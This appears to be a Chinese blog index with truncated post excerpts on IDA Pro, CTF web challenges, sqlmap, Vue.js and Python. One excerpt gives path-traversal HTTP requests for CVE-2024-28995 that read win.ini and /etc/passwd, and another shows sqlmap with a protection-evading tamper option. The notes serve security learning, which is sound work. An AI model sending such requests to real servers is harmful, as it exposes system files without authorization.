re入门
IDA Pro是一款逆向工程工具,可以用来分析二进制文件,它可以将二进制文件转换成汇编代码,方便我们进行逆向分析。IDA Pro是一款非常强大的逆向工程工具,但是它的学习曲线也比较陡峭,所以我们需要一些基础的知识来帮助我们学习IDA Pro。 IDA 分为IDA 32 ,IDA 64,IDA 64是64位的,IDA 32是32位的,我们一般使用IDA 64来分析64位的二进制文件,使用ID...
IDA Pro是一款逆向工程工具,可以用来分析二进制文件,它可以将二进制文件转换成汇编代码,方便我们进行逆向分析。IDA Pro是一款非常强大的逆向工程工具,但是它的学习曲线也比较陡峭,所以我们需要一些基础的知识来帮助我们学习IDA Pro。 IDA 分为IDA 32 ,IDA 64,IDA 64是64位的,IDA 32是32位的,我们一般使用IDA 64来分析64位的二进制文件,使用ID...
玩玩web <?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$st...
[强网杯 2019]高明的黑客 题目描述 有备份? 敏感路径泄露 代码居多,应该找到函数的入口,或者看看有没有什么敏感的函数 eval
没事打打CTF 也是一种乐趣,这里记录一下一些Web方向的题目,以及解题思路。 ======= <?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("password error"); } $sql="select * from us...
没事打打CTF 也是一种乐趣,这里记录一下一些Web方向的题目,以及解题思路。 SQLMap 在上述命令中,–batch 选项用于自动执行操作而无需手动干预,–level=4 选项增加了测试强度,–tamper=space2comment 选项用于规避防护机制。 命令的基本格式和说明如下: python .\sqlmap.py -u <目标URL> --batch --leve...
CVE-2024-36991 CVE-2024-36991
CVE-28559 cve-2024-28995 Windows GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 linux GET /?InternalDir=........\etc&InternalFile=passwd HTTP/1.1 ~~
PyCharm shadows build-in name 避免使用python内置函数名称
Vue.js 是一个流行的 JavaScript 框架,用于构建现代的交互式 Web 应用程序。它提供了一种简单而灵活的方式来创建用户界面,使开发者能够轻松地构建复杂的单页面应用(SPA)和动态网页。Vue.js 的核心库只关注视图层,因此它易于集成到现有项目中,并且可以与其他库和框架(如 React 和 Angular)一起使用。 开始 npm run dev 启动开发服务器 基本文...
isinstance 是 Python 编程语言中的一个内置函数,它用于检查一个对象是否是指定类或者是该类所定义的类的实例。 具体来说,isinstance() 函数接受两个参数:第一个参数是需要检查的对象,第二个参数是一个类或者包含多个类的元组。如果第一个参数是第二个参数指定的类或者是从属于这个类的子类,那么 isinstance() 函数将返回 True,否则返回 False。 这个...